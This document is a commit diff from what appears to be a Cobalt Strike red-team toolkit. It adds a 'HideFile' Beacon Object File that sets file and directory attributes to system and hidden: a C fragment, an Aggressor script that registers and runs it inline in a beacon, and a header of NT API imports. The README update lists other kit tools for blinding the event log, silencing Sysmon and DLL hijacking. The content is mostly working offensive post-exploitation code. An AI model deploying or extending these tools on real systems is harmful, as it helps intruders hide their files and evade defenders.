+	path = BeaconDataExtract(&parser, NULL);
+	
+	if (MSVCRT$strcmp(option, "dir") == 0) {
+		res = CreateHiddenDir(path);
+		if (res) BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully modified directory attributes to systemfile + hidden.\n");
+	}
+	else if (MSVCRT$strcmp(option, "file") == 0) {
+		res = CreateHiddenFile(path);
+		if (res) BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully modified file attributes to systemfile + hidden.\n");
+	}
+	else BeaconPrintf(CALLBACK_ERROR, "Please specify one of the following options: dir | file\n");
+
+	return 0;
+}

KIT/HideFile/hidefile.cna

@@ -0,0 +1,43 @@
+# author REDMED-X
+
+beacon_command_register(
+	"hidefile", "Hide file or directory by setting it's attributes to systemfile + hidden.\n",
+	"INFO:\nHide a directory or file from plain sight by modifying the attributes and set them to systemfile + hidden.\n\nOPTIONS:\n[dir]: set this option if you want to modify the attributes of a directory.\n[file]: set this option if you want to modify the attributes of a file.\n[<path to dir/file>]: path to the directory or file that you want to hide.\n\n" .
+	"USAGE:\nhidefile <dir | file> <path to dir/file>\n\n");
+
+
+alias hidefile {
+    $bid = $1;
+    $option = $2;
+	$path = $3;
+
+
+	if ($option eq "") {
+		berror($bid, "Please specify one of the following options: dir | file\n");
+		return;
+	}
+	
+	if ($option eq "dir" || $option eq "file") {
+		if ($path eq "") {
+			berror($bid, "Please specify the correct path to the target directory or file.\n");
+			return;
+		}
+	}
+	else {
+		berror($bid, "This option isn't supported. Please specify one of the following options: dir | file\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("hidefile.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data  = bof_pack($bid, "zZ", $option, $path);
+	
+	blog($bid, "Tasked to hide directory or file..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+

KIT/HideFile/hidefile.h

@@ -0,0 +1,134 @@
+#include <windows.h>
+
+typedef struct _FILE_BASIC_INFORMATION {
+	LARGE_INTEGER CreationTime;				// absolute system, number of 100-nanosecond intervals 
+	LARGE_INTEGER LastAccessTime;			// since the start of the year 1601 in the Gregorian calendar.
+	LARGE_INTEGER LastWriteTime;
+	LARGE_INTEGER ChangeTime;
+	ULONG FileAttributes;					// metadata about the file, ex.: archive, compressed, directory, hidden, etc.
+} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
+
+
+typedef enum _FILE_INFORMATION_CLASS {
+    FileDirectoryInformation                         = 1,
+    FileFullDirectoryInformation,                   // 2
+    FileBothDirectoryInformation,                   // 3
+    FileBasicInformation,                           // 4
+    FileStandardInformation,                        // 5
+    FileInternalInformation,                        // 6
+    FileEaInformation,                              // 7
+    FileAccessInformation,                          // 8
+    FileNameInformation,                            // 9
+    FileRenameInformation,                          // 10
+    FileLinkInformation,                            // 11
+    FileNamesInformation,                           // 12
+    FileDispositionInformation,                     // 13
+    FilePositionInformation,                        // 14
+    FileFullEaInformation,                          // 15
+    FileModeInformation,                            // 16
+    FileAlignmentInformation,                       // 17
+    FileAllInformation,                             // 18
+    FileAllocationInformation,                      // 19
+    FileEndOfFileInformation,                       // 20
+    FileAlternateNameInformation,                   // 21
+    FileStreamInformation,                          // 22
+    FilePipeInformation,                            // 23
+    FilePipeLocalInformation,                       // 24
+    FilePipeRemoteInformation,                      // 25
+    FileMailslotQueryInformation,                   // 26
+    FileMailslotSetInformation,                     // 27
+    FileCompressionInformation,                     // 28
+    FileObjectIdInformation,                        // 29
+    FileCompletionInformation,                      // 30
+    FileMoveClusterInformation,                     // 31
+    FileQuotaInformation,                           // 32
+    FileReparsePointInformation,                    // 33
+    FileNetworkOpenInformation,                     // 34
+    FileAttributeTagInformation,                    // 35
+    FileTrackingInformation,                        // 36
+    FileIdBothDirectoryInformation,                 // 37
+    FileIdFullDirectoryInformation,                 // 38
+    FileValidDataLengthInformation,                 // 39
+    FileShortNameInformation,                       // 40
+    FileIoCompletionNotificationInformation,        // 41
+    FileIoStatusBlockRangeInformation,              // 42
+    FileIoPriorityHintInformation,                  // 43
+    FileSfioReserveInformation,                     // 44
+    FileSfioVolumeInformation,                      // 45
+    FileHardLinkInformation,                        // 46
+    FileProcessIdsUsingFileInformation,             // 47
+    FileNormalizedNameInformation,                  // 48
+    FileNetworkPhysicalNameInformation,             // 49
+    FileIdGlobalTxDirectoryInformation,             // 50
+    FileIsRemoteDeviceInformation,                  // 51
+    FileUnusedInformation,                          // 52
+    FileNumaNodeInformation,                        // 53
+    FileStandardLinkInformation,                    // 54
+    FileRemoteProtocolInformation,                  // 55
+    FileRenameInformationBypassAccessCheck,         // 56
+    FileLinkInformationBypassAccessCheck,           // 57
+    FileVolumeNameInformation,                      // 58
+    FileIdInformation,                              // 59
+    FileIdExtdDirectoryInformation,                 // 60
+    FileReplaceCompletionInformation,               // 61
+    FileHardLinkFullIdInformation,                  // 62
+    FileIdExtdBothDirectoryInformation,             // 63
+    FileDispositionInformationEx,                   // 64
+    FileRenameInformationEx,                        // 65
+    FileRenameInformationExBypassAccessCheck,       // 66
+    FileDesiredStorageClassInformation,             // 67
+    FileStatInformation,                            // 68
+    FileMemoryPartitionInformation,                 // 69
+    FileStatLxInformation,                          // 70
+    FileCaseSensitiveInformation,                   // 71
+    FileLinkInformationEx,                          // 72
+    FileLinkInformationExBypassAccessCheck,         // 73
+    FileStorageReserveIdInformation,                // 74
+    FileCaseSensitiveInformationForceAccessCheck,   // 75
+    FileKnownFolderInformation,   					// 76
+    FileMaximumInformation
+} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
+
+
+typedef struct _IO_STATUS_BLOCK {
+  union {
+    NTSTATUS Status;
+    PVOID    Pointer;
+  };
+  ULONG_PTR Information;
+} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
+
+
+typedef NTSTATUS (NTAPI *NtQueryInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+
+typedef NTSTATUS (NTAPI *NtSetInformationFile_t)(
+  HANDLE                 FileHandle,
+  PIO_STATUS_BLOCK       IoStatusBlock,
+  PVOID                  FileInformation,
+  ULONG                  Length,
+  FILE_INFORMATION_CLASS FileInformationClass
+);
+
+//CreateHiddenDir
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryW(LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetFileAttributesW(LPCWSTR lpFileName);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$getchar(void); 
+
+//CreateHiddenFile
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
+
+//main
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); 
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);
+

README.md

@@ -1,5 +1,5 @@
 # OperatorsKit
-This repository contains a collection of tools that integrate with Cobalt Strike through Beacon Object Files (BOFs). 
+This repository contains a collection of tools that integrate with Cobalt Strike through Beacon Object Files (BOFs).  
 
 ## Kit content
 The following tools are currently in the operators' kit: 
@@ -7,11 +7,13 @@ The following tools are currently in the operators' kit:
 |Name|Decription|
 |----|----------|
 |**[BlindEventlog](KIT/BlindEventlog)**|Blind Eventlog by suspending its threads.|
+|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables) |
 |**[FindDotnet](KIT/FindDotnet)**|Find processes that most likely have .NET loaded.|
 |**[FindHandle](KIT/FindHandle)**|Find "process" and "thread" handle types between processes.|
 |**[FindLib](KIT/FindLib)**|Find loaded module(s) in remote process(es).|
 |**[FindRWX](KIT/FindRWX)**|Find RWX memory regions in a target process.|
 |**[FindSysmon](KIT/FindSysmon)**|Verify if Sysmon is running through enumerating Minifilter drivers and checking the registry.|
+|**[HideFile](KIT/HideFile)**|Hide file or directory by setting it's attributes to systemfile + hidden.|
 |**[LoadLib](KIT/LoadLib)**|Load a on disk present DLL via RtlRemoteCall API in a remote process.|
 |**[PSremote](KIT/PSremote)**|List all running processes on a remote host.|
 |**[SilenceSysmon](KIT/SilenceSysmon)**|Silence the Sysmon service by patching its capability to write ETW events to the log.|